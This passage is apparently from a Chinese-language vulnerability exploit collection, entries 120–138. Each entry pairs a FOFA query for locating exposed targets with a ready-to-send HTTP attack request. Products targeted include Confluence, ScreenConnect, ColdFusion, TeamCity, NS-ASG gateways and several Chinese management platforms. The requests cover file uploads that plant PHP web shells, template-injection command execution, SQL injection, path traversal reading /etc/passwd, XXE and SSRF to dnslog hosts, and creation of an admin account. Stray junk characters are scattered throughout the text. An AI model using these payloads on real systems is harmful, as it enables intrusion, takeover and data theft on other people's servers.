X-Forwarded-For: 1.1.1.19 }& P% M& K3 x( F9 \# V2 p
X-Originating-Ip: 1.1.1.11 y$ U* A- ?7 v& w, { A3 f1 t
X-Remote-Ip: 1.1.1.1
4 W6 W6 ^& u- j( ]X-Remote-Addr: 1.1.1.1
4 D# H$ L$ y% O1 [6 e, [4 aTe: trailers
- Q% `. i- O, D' ]# Y, m S% tConnection: close% `0 y5 W4 B0 g; g$ U
1 X9 }! b0 k( w7 r$ ] F
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|1234560 J( T9 R X( Z7 Z0 \8 \- I
6 ^& K. E7 A; T
0 S1 z$ [! b$ V8 Y( s
120. 北京百绰智能S40管理平台导入web.php任意文件上传
6 O& l4 M9 g" b. v D9 lCVE-2024-1253' K3 {2 K* ]" ^, K
FOFA:title="Smart管理平台"4 I* Z; D" E2 l/ J
POST /useratte/web.php? HTTP/1.1" |1 e2 t7 @; ^5 P
Host: ip:port
3 W5 }# D3 U( O0 ~Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db5 b5 y2 D+ v6 f X% G
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko7 a% G. C$ s5 ?9 `8 i& J; s8 ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ m6 t( e5 R4 N; [: dAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 _+ y# Q6 G5 a' H, L' DAccept-Encoding: gzip, deflate, |# }6 y! h/ b, S
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328! x* g L9 E% ~# W* ~' P8 Q
Content-Length: 5973 P2 ]* `. b) g) I" L$ k1 Q3 ?
Origin: https://ip:port
* X( _* ]/ a( w" m( Z4 ?4 tReferer: https://ip:port/sysmanage/licence.php/ P- G# ~7 t! i2 W' R- X! @
Upgrade-Insecure-Requests: 1
2 y2 W; [) v: t, h# \8 t7 zSec-Fetch-Dest: document% e$ n( z% ~( C/ ^9 i( n
Sec-Fetch-Mode: navigate. d! D0 _3 R# z( x+ L# ?3 w+ u
Sec-Fetch-Site: same-origin' W2 L% O9 f7 X, h9 D
Sec-Fetch-User: ?1
0 @: [$ ]% K, e) \Te: trailers: ` s; L! v9 u% d
Connection: close8 ?. u' ]3 ?0 ^: T
% L/ |+ y! ^5 z
-----------------------------42328904123665875270630079328, v/ Q+ {! t8 e- t% r$ M
Content-Disposition: form-data; name="file_upload"; filename="2.php"
3 |9 L) r ]1 H [/ J) r# K- ~Content-Type: application/octet-stream
2 y1 v+ o, r9 Y/ _9 w% Z8 a% B$ \
& \+ Z; T' B1 h0 `5 C0 U<?php phpinfo()?>* [& S$ P7 }8 W7 ]7 p$ ~9 Z
-----------------------------42328904123665875270630079328
# q+ K: ~- k2 T. hContent-Disposition: form-data; name="id_type"! v6 [! x% g/ i- N: D
( |2 X: S8 n) ]9 w1
, Z$ b7 @( O4 ^4 u- N-----------------------------42328904123665875270630079328
: l- u7 N+ S1 X7 O$ z$ EContent-Disposition: form-data; name="1_ck"
3 ?* E7 q% S5 W0 S: `7 m, K
6 r! L }6 D" s# C8 y$ [* {1_radhttp- I/ u& ?% Y3 t7 S, [
-----------------------------42328904123665875270630079328
7 n- m0 a( U- j* u) ?Content-Disposition: form-data; name="mode"
$ m+ |( j% n/ k: R3 V! b7 h+ e/ o
* a) U8 X' l/ n6 `. ?9 u- [* x: g: j% simport
0 ?4 H5 F6 z+ A- r-----------------------------42328904123665875270630079328, P `$ N/ z6 A- u, c8 G
* W; ]0 a; E6 c# F ^4 B% H: O' k0 n
/ F) ~5 [3 }! w6 f; \7 x+ [
文件路径/upload/2.php
L& n" O- r7 ~" M+ R5 U! }
! u6 i0 e6 }) ?6 a8 o( G121. 北京百绰智能S42管理平台userattestation.php任意文件上传& a# Z2 o Z4 o5 b2 P
CVE-2024-1918
4 a& c0 a- y- {" W5 YFOFA:title="Smart管理平台". w7 \- Y4 G [
POST /useratte/userattestation.php HTTP/1.1
' y" ?: B3 t1 E0 AHost: 192.168.40.130:8443
9 A3 K1 g, c' v0 ECookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50 u2 A {9 q6 Y5 b5 Z3 A4 n
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
* v6 X( r+ P, x6 z* ^% a% fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" U/ l. Z1 v/ k) X9 [9 I1 b" dAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# C- R" J1 Y# d0 Z9 _- i5 O# C
Accept-Encoding: gzip, deflate
5 j# E5 q7 O9 x3 [7 J7 o* NContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328* G4 M" ^( Q; }+ ]+ z
Content-Length: 592: r- k( p- u* W: {8 r1 z! E
Origin: https://192.168.40.130:8443
% g. n1 u7 v+ t6 j R2 {Upgrade-Insecure-Requests: 1
/ C0 F. A* a3 r9 q; i! r1 ]Sec-Fetch-Dest: document! j( G! P- m$ Y& f7 f* x; M
Sec-Fetch-Mode: navigate8 c$ j5 J$ f0 a/ ~% F0 X$ }
Sec-Fetch-Site: same-origin
' s; a" u! p. w8 Y9 D9 E5 J, QSec-Fetch-User: ?1
$ |" _% B, M/ |4 p U& n- H. @ n( FTe: trailers
, O8 z$ g, H8 ]9 _/ A) b/ Q9 ~: U3 m/ uConnection: close
' l K5 |9 b0 w( h+ n/ U7 v* X f. y
-----------------------------42328904123665875270630079328. y* _; a1 ?9 G% a' F9 `* {1 g4 o
Content-Disposition: form-data; name="web_img"; filename="1.php"
. L% h% i+ Z e0 HContent-Type: application/octet-stream
" w- S9 n \6 k( k9 |9 L& ^8 k/ @) E2 u' y# }
<?php phpinfo();?>
$ d |) I# \' P; Y* e-----------------------------42328904123665875270630079328
" X0 z0 O& h) D+ v' n9 ^5 FContent-Disposition: form-data; name="id_type"0 f, ~5 r6 ]% r) V
( W* ?, ]; x5 |: I
1
( J+ x; t4 V3 a% |2 A Y2 G2 Y-----------------------------42328904123665875270630079328
, g% H9 A- s( p3 c" g: E+ _Content-Disposition: form-data; name="1_ck"
* [+ T u2 V; L1 [8 [1 x$ M$ X5 k2 t% @' B/ F7 O' u* ^6 |. M
1_radhttp" I9 L& X* ^9 C% Y0 B% W6 e: w5 Z
-----------------------------42328904123665875270630079328
; j0 x) G" i# g4 Q- ZContent-Disposition: form-data; name="hidwel"0 t! E. I9 `0 F- V1 P& `/ x# \
w& O1 f) F. Yset2 n |; p; H% O! {
-----------------------------42328904123665875270630079328) a0 Q" C, P: h, o
; `9 \6 q$ i8 a3 i2 I7 y7 |' ~
; m6 w/ j) ?. A# xboot/web/upload/weblogo/1.php; A1 N3 S3 z0 v; N2 I; f5 a& _9 E
0 w2 a+ Q1 u# I4 o
122. 北京百绰智能s200管理平台/importexport.php sql注入: w8 F8 u- G+ j! B
CVE-2024-27718FOFA:title="Smart管理平台"
* \9 f3 g3 |6 Y% k其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()* _' r2 Q! I& c/ V7 s4 T
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
! j' O/ o* k6 c# e% d7 f6 W$ T& b" v8 vHost: x.x.x.x( r3 A9 H5 {1 `
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
' @; t8 n$ f+ u& w* D9 x6 @- aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0) K, ?* w" V+ h! P$ F/ ]- `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 d" C8 |% f4 K Z; k+ p" ^% F# U
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( X9 H8 T. p* Q: P# p4 b) J4 G/ }Accept-Encoding: gzip, deflate, br! X! o1 O% {8 z% V
Upgrade-Insecure-Requests: 1* ^/ y7 }' _9 N7 T g
Sec-Fetch-Dest: document2 s$ [% f/ E4 l8 C# B
Sec-Fetch-Mode: navigate
& |5 z7 j4 z/ I! g: @9 ?. jSec-Fetch-Site: none
2 R2 Y2 w# A8 M! r3 XSec-Fetch-User: ?1
8 x+ c+ [& G `; t/ t- @6 Y6 A0 m. K. ^Te: trailers
) s$ y% T+ j/ Q1 Z+ b# x {Connection: close( n( ^- U) ?" ~
0 Q/ g% T# O, E; i4 t
8 _. s; V% c! Z) T2 W& f
123. Atlassian Confluence 模板注入代码执行0 T( W3 r0 {2 s6 J! `4 x
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"! T& A5 R d2 c0 g' b h
POST /template/aui/text-inline.vm HTTP/1.1
+ a( c4 M2 h- j! hHost: localhost:80900 a& H# T1 f- m4 O9 H+ D8 [
Accept-Encoding: gzip, deflate, br
% W. B; e5 f1 U V5 sAccept: */*, u$ ~% ]* M/ E+ ?5 v7 z C
Accept-Language: en-US;q=0.9,en;q=0.8
* Y/ }2 O/ j$ X2 rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
+ O* f. @7 v1 T) Y: v/ P RConnection: close. b/ `: e8 O1 ~3 I
Content-Type: application/x-www-form-urlencoded
' a& }, a; B# f+ R6 x& A, L S+ `, Z! H
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))) U. M+ x9 S% `, b
- Z$ D% U) O; T* d" Q* T
/ w+ O. h6 U* b124. 湖南建研工程质量检测系统任意文件上传; Y5 d% Q, M! W% C5 @/ M3 d
FOFA:body="/Content/Theme/Standard/webSite/login.css"0 _) i. n* x+ C) p
POST /Scripts/admintool?type=updatefile HTTP/1.18 s' S' I* x9 Y% T
Host: 192.168.40.130:8282
/ @0 s0 M( h: W) n+ b6 N7 @User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36: G! w+ f; N& {* l, k' q: E
Content-Length: 729 Y, ^8 n# r; @. s: V' U/ R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8) ~2 k5 g4 E/ b) i9 G& r/ z
Accept-Encoding: gzip, deflate, br
2 z) z. c) C" Y8 Z) l( b7 fAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 A2 A' C, U8 m t" c9 }0 ?* R7 R
Connection: close ]' I+ h* ~; L7 {( k
Content-Type: application/x-www-form-urlencoded
- F# q! }/ z4 f% f: P9 }$ o& |0 p( A6 D L. ^: o3 G+ j
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>( l- R4 F) G" m7 G6 p
8 z- `+ k$ y. L1 v& b
6 Y! R7 W) J! Y" Y5 _http://192.168.40.130:8282/Scripts/abcgcg.aspx W/ y t4 h' P+ Y
! @. @9 l6 _* u/ K5 w7 l' D
125. ConnectWise ScreenConnect身份验证绕过
]. s" _4 ^: J9 TCVE-2024-1709
' N: K9 A( Z! f: i2 {' `FOFA:icon_hash="-82958153"$ k. k, ]/ n! M% X2 }7 L+ I: _, c
https://github.com/watchtowrlabs ... bypass-add-user-poc1 S" E4 ?* Z5 b* Z& k
. U. E8 V+ A6 c
7 i* }9 E; x- M. T! O! [* R* Q使用方法
0 f) f: ^2 a" G k; v. upython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
. b# f+ e: T8 j* H% T* o9 x k9 W/ B- l
6 y6 I; ], A9 V; x. Z' k9 O创建好用户后直接登录后台,可以执行系统命令。
% L- ?# R- X+ h7 Y C) M3 m% F/ j: p5 }7 s( t0 w+ @
126. Aiohttp 路径遍历
& E$ M2 e' [& Y7 jFOFA:title=="ComfyUI"# E3 g+ K, m$ x9 O( A# V9 {: Z
GET /static/../../../../../etc/passwd HTTP/1.1- B# C8 m9 s' E5 c1 p( ^3 Z
Host: x.x.x.x
; G- r4 |4 x5 e1 \! G2 {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36- U+ ?* H/ ^% I# l9 J
Connection: close0 h/ u2 y3 Z8 C: T# V4 N9 L
Accept: */*
9 G" p% D9 `: i' \7 J- |" aAccept-Language: en
( T' q8 j7 q0 w% N' u/ j0 y/ @: lAccept-Encoding: gzip
6 l# W3 M- ?3 v4 X& X# \& ^/ @2 a5 K5 m" ~+ r
% s n+ A" E' _+ h127. 广联达Linkworks DataExchange.ashx XXE
% D' j( ?9 A# R. |6 cFOFA:body="Services/Identification/login.ashx"
7 d7 @7 c3 {" E8 v1 ]; q- kPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1# G% L* [% m! V1 M4 E( Q
Host: 192.168.40.130:8888* V$ @- C$ j2 m* b4 x2 N8 O: @1 E! j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
6 P8 C5 [/ V8 R3 N- t9 fContent-Length: 415
# ?. e& s' w6 RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 S. ^$ E O5 G4 o6 k
Accept-Encoding: gzip, deflate5 z9 }1 ]6 i# W8 o
Accept-Language: zh-CN,zh;q=0.9
3 Y$ u2 w# E. j$ u+ V AConnection: close
$ b( S y; w) a$ }3 X5 VContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0& \# Q3 J7 u. h
Purpose: prefetch
* R& ?" Q3 }6 t; lSec-Purpose: prefetch;prerender2 I; Z0 K2 K- c0 B8 ^
+ r9 J, R7 S) s7 x9 y! j
------WebKitFormBoundaryJGgV5l5ta05yAIe0* M$ ~- }. g* Y# V0 ?) S G$ h
Content-Disposition: form-data;name="SystemName"" ~2 N( `5 ~6 E% _1 l
1 `1 r) z4 i0 H( l {
BIM
/ g7 E9 E8 V7 V- z( X% E2 I- V------WebKitFormBoundaryJGgV5l5ta05yAIe08 i; x4 E0 i M5 f, q# j& G3 p8 \3 e
Content-Disposition: form-data;name="Params"( r' y( Q) O a
Content-Type: text/plain. C M- }. a: N! A. M4 u1 ?
" \5 N1 `8 x( { T
<?xml version="1.0" encoding="UTF-8"?># w6 g+ c) }- g! k
<!DOCTYPE test [
9 p( W0 b) `, I0 v$ l. c0 z8 _<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">8 ]$ l8 r% Z! D6 E# F% z
]
9 U6 z6 k, |- c3 T( K! |" Z/ c9 z>
/ s3 a9 \; b5 `$ O<test>&t;</test>
, W8 q/ m# m& ~7 F$ J* a+ n- a------WebKitFormBoundaryJGgV5l5ta05yAIe0--
, w& b& _) U4 \, ?6 d) V+ c6 `9 y U$ N( ^" J7 Q
- a( v) D1 w: [9 I9 d* l' H
4 V6 J5 Y0 {, z0 N5 Y
128. Adobe ColdFusion 反序列化9 g. \3 R1 w' i: Z4 J5 y
CVE-2023-38203
* B- R4 I& x. @ e% Z% `! c) DAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)( W% A w3 g* G/ J' L: |
FOFA:app="Adobe-ColdFusion"5 u- ?& F2 @- L6 p7 R0 O
PAYLOAD
$ u6 t6 ^0 d* [
) w1 ?. j" e8 G129. Adobe ColdFusion 任意文件读取
/ ]9 S6 v- a' L/ j! K9 n; TCVE-2024-20767; D+ E2 z& a$ q) v9 m" j
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"+ x2 _. W0 u& d5 G1 v! m! i% n
第一步,获取uuid
9 \8 J" F0 Z/ E; a) A9 z; s3 |; {+ s: TGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
& E* g7 p+ A- X6 QHost: x.x.x.x
9 A& c T8 G0 W5 m4 e6 P( @ P) RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36; |4 |$ _9 A6 F5 e# ~! k
Accept: */*
+ F, k* m7 _! q3 f9 ]Accept-Encoding: gzip, deflate
5 g9 `3 t# G- i& ]Connection: close$ X, z6 B6 K# P5 k7 f+ c$ A
5 y4 [0 b- B% ?3 G, A& E, I! t$ ?) b4 T
. @+ z8 `: [# z/ M( }% r第二步,读取/etc/passwd文件
& R' `; p- `1 ~6 T3 \GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.14 ^2 \! {8 Z, p! t, ]" ^# F
Host: x.x.x.x
9 j# A4 l5 m; f* v8 X: yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
0 ?" u7 ^/ [/ F1 S+ }9 l! VAccept: */*
@6 e5 E9 r# U: T' iAccept-Encoding: gzip, deflate" \# i p+ o: ]- t" E
Connection: close
+ H) h5 J; M) q( ]$ juuid: 85f60018-a654-4410-a783-f81cbd5000b9
# y d4 k. `* P2 X3 B5 ?+ f- {# b& R" J- a% D' V
9 Y, v' v9 t: n7 o/ t/ C8 f/ {. v
130. Laykefu客服系统任意文件上传8 a! b! i* k. V# N0 t. E; u
FOFA:icon_hash="-334624619"
" b" N# y' v, Q: i* `* zPOST /admin/users/upavatar.html HTTP/1.13 `; \% b1 f2 L4 {* g4 i& _9 z3 i
Host: 127.0.0.1* W: i z! y, V2 W" ~
Accept: application/json, text/javascript, */*; q=0.01
0 g$ e/ [7 W2 w% G$ _X-Requested-With: XMLHttpRequest/ |# W' Z0 ^* i( F
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.266 x+ w. s* ?! X1 L9 z% x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR- g# a7 ~! Y, C8 o% b
Accept-Encoding: gzip, deflate1 R+ y* x( v F' J4 ~
Accept-Language: zh-CN,zh;q=0.9& d; [, q0 h, a, [
Cookie: user_name=1; user_id=3
: h6 d j# e9 B& }Connection: close
- _' g$ }2 f7 H* |# G
c! p% T* D! N _' D3 w------WebKitFormBoundary3OCVBiwBVsNuB2kR
2 m% P5 ]$ V) ~* k; zContent-Disposition: form-data; name="file"; filename="1.php"; \: ]+ x8 n. F
Content-Type: image/png. {5 V, [/ Z1 P6 _/ T
$ g# o3 H) `7 x( i2 _+ M) m
<?php phpinfo();@eval($_POST['sec']);?>
* T& p% ]$ J7 y------WebKitFormBoundary3OCVBiwBVsNuB2kR--
2 X, f3 z8 q6 _/ u, }( D1 c$ ]
8 u6 M8 O* g7 @5 Y7 M131. Mini-Tmall <=20231017 SQL注入& L7 {. S0 r; g' C: f# O# ~ |
FOFA:icon_hash="-2087517259"
& Y" T8 l! U$ b后台地址:http://localhost:8080/tmall/admin
* _! C" b! s2 }: Ihttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
4 N& \- I# c( ~% Z" X7 S
6 \; Z4 G1 k4 j1 I8 V132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过* Q3 C; Q( ]) a l
CVE-2024-27198
8 Z9 U- M2 C# s( ~( k) SFOFA:body="Log in to TeamCity"+ O7 Z5 k: Q9 k' D7 K
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1$ o! e8 @0 @0 w( \# B" Y! l+ w
Host: 192.168.40.130:8111
. B$ e) b2 q+ @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36: b: v3 Y( D% X" F1 W" B- h1 [* u! I
Accept: */*. U& R) B- s# r7 z1 ^8 W# c V
Content-Type: application/json
* O7 J1 O: b% c Y% }1 lAccept-Encoding: gzip, deflate% o9 R/ }* d9 y Z% p# R$ [
; d1 s2 d! P8 u+ x{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}; Z! `, J" X8 o/ P2 s
& `' w5 T& O$ `6 {* w
4 X; D! S* j# u/ v0 DCVE-2024-27199
: ~$ h3 x8 I/ b! a9 S) @9 U7 v/res/../admin/diagnostic.jsp3 g* _/ t) r3 B4 A
/.well-known/acme-challenge/../../admin/diagnostic.jsp
5 a! y" Q0 d1 l/update/../admin/diagnostic.jsp
* h- k! N S- X
6 `+ q! K% r4 {8 O! @8 ]
+ F# m6 d$ y! w6 A- S( l1 V& T4 wCVE-2024-27198-RCE.py6 E# V0 L" U! j' Q' H" f6 B
, e6 V }% o* j: m- b1 B
133. H5 云商城 file.php 文件上传; z3 D( ?+ R' J& F" r* H
FOFA:body="/public/qbsp.php"2 f3 W- W$ f0 Q
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
: B) M. b- J# @0 g [- aHost: your-ip% m, I& @5 |8 Y. f V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36+ ^5 k6 E- b/ {6 V5 C
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx# v9 [# @$ H/ {4 y
- ~* ~! u. S# S6 Y+ ^8 z4 ]8 G7 Q------WebKitFormBoundaryFQqYtrIWb8iBxUCx; |4 E# C* `1 \3 S# g
Content-Disposition: form-data; name="file"; filename="rce.php" f' J% b. {* L) y9 e6 Y
Content-Type: application/octet-stream* |0 C& p+ j0 i* f; l
2 [. Q& h+ o* U! Y4 Z<?php system("cat /etc/passwd");unlink(__FILE__);?>/ |0 q! w- ?7 [, L% t/ Q: u& q
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--% m$ r0 X# A7 `( P- A0 b' Y
* W. [9 Y" d/ F8 @
9 ?% U1 a! |6 R5 e: H/ E
( g* R. U& m( s. A8 E/ T0 ]) y
134. 网康NS-ASG应用安全网关index.php sql注入
) o8 q1 a4 s% N+ g% I3 }CVE-2024-2330
9 z. c, ?2 q6 SNetentsec NS-ASG Application Security Gateway 6.3版本
. t0 @5 ^* ^0 u6 _& kFOFA:app="网康科技-NS-ASG安全网关"5 q: a" @8 E8 M `
POST /protocol/index.php HTTP/1.1$ f& N! Z6 M+ _# ]
Host: x.x.x.x$ h2 ~' ?) K# U; M* X
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de! q* H! X- c+ s7 d; H6 U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0 K }7 j: r- {9 ^1 b6 Z* g% c! Y& I Z. T
Accept: */*
$ _* i% N- z7 C( _2 Y4 ?3 ]; l# kAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: W2 t, s, \& F( L* s# @2 \Accept-Encoding: gzip, deflate
& d9 I- Y4 L% X9 R: j2 M) r4 H8 O) KSec-Fetch-Dest: empty
8 e: Q" S$ u* {" n1 ~% b# `- MSec-Fetch-Mode: cors
+ G. v4 W; R6 [Sec-Fetch-Site: same-origin
1 o8 c2 A0 E" v; D& }- RTe: trailers' W$ ?' R) @% b) a5 Y
Connection: close
, ^" p1 ?& l- h' R' kContent-Type: application/x-www-form-urlencoded- {0 v* c3 s; o/ f2 ? W
Content-Length: 263
9 R& T+ v( z( X8 E# A
) s# a' A5 V! L- Q. Cjsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
3 ]. a# j9 i4 r3 s0 V( x6 {
, ?; B) P9 x! ?$ g! V& W5 F& K/ G2 L" s0 Q! w
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
9 \" K. G. W+ D. E, c4 OCVE-2024-20222 @, m. a# x1 X) I! m; r6 a+ a
Netentsec NS-ASG Application Security Gateway 6.3版本- z; V! {$ C# x; r3 \* j3 z
FOFA:app="网康科技-NS-ASG安全网关"
! ?. M9 B8 D7 v2 cGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
5 J6 T! f+ q3 u( h) r1 y; OHost: x.x.x.x- @5 [9 w: W& W0 I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.368 b8 S% l q- p) G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; f3 C2 G7 U3 T
Accept-Encoding: gzip, deflate5 _7 \5 V E( s p7 ]
Accept-Language: zh-CN,zh;q=0.9
' T" a4 z" H6 LConnection: close! X: C8 E' W, g6 D
% x8 A3 p% y; C$ I% @" L4 L
A1 @' A1 i7 P& [$ H; d }136. NextChat cors SSRF
' P( }. ?+ F. v8 ECVE-2023-49785' U0 M+ g& P* B* T6 ~7 O
FOFA:title="NextChat"
/ h: \/ p) T# z5 E2 [GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1& W3 b+ @. Y5 U0 P7 g: j/ Y
Host: x.x.x.x:10000
4 Y, a/ Q. {) u' T. wUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
y6 Z' j7 J/ qConnection: close: D/ J. R3 Q6 E* a, v* I( |7 C
Accept: */*
, l4 Z( i5 Q$ p, v- EAccept-Language: en* f' Z/ t: \3 n( Z" I! b" l/ m" R
Accept-Encoding: gzip7 e& _7 A: Q z: e+ P. Y0 u; F
, o4 Z$ x! s4 t+ b
" N6 Z ?6 Z; C) ?
137. 福建科立迅通信指挥调度平台down_file.php sql注入. Z7 J& i( E6 ]( k8 u( ^+ c7 Q
CVE-2024-26204 \6 o# ~+ O. [" P( ~( \+ K
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台", j* E' B, Q q) v$ p2 Y) b1 q
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
) R) F1 R4 H. A* i$ p( L0 R& QHost: x.x.x.x# K! c4 B0 r& z, S* R4 {* H2 r5 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
# t! _; l1 q, A( ^$ f# [( T2 @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8& o1 n' r! {* L) C8 a) e# r" Y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 `" C/ a% g+ n. r+ k9 h5 s5 w
Accept-Encoding: gzip, deflate, br
3 \( i- j! q! n, E! QConnection: close
( {8 m; ?" N* Z% d& l+ ICookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj: }/ @: k! {; w {
Upgrade-Insecure-Requests: 11 x2 R* G- b1 `9 {2 c1 E
1 ~5 ~: {& ]( R6 m7 B- {$ }
" E$ i& C- t3 V( b, h3 s' d138. 福建科立讯通信指挥调度平台pwd_update.php sql注入8 U) Z* e& ~ n" F
CVE-2024-2621
0 k+ M X- |( m0 w& x( E3 ZFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"4 J. K) ], F9 [' E7 m
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1: t) j7 X! G& G% C6 [4 o
Host: x.x.x.x
0 Z; [: M3 E9 c' w4 U! jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0+ ^! r( K5 p: d2 n9 X, H7 S; A# U& k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 w% K! l- B/ W/ [5 f* x9 |, K" E# e
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* H' A& x7 C2 r9 @0 l2 [
Accept-Encoding: gzip, deflate, br
" h F5 I% c# Y# w% XConnection: close
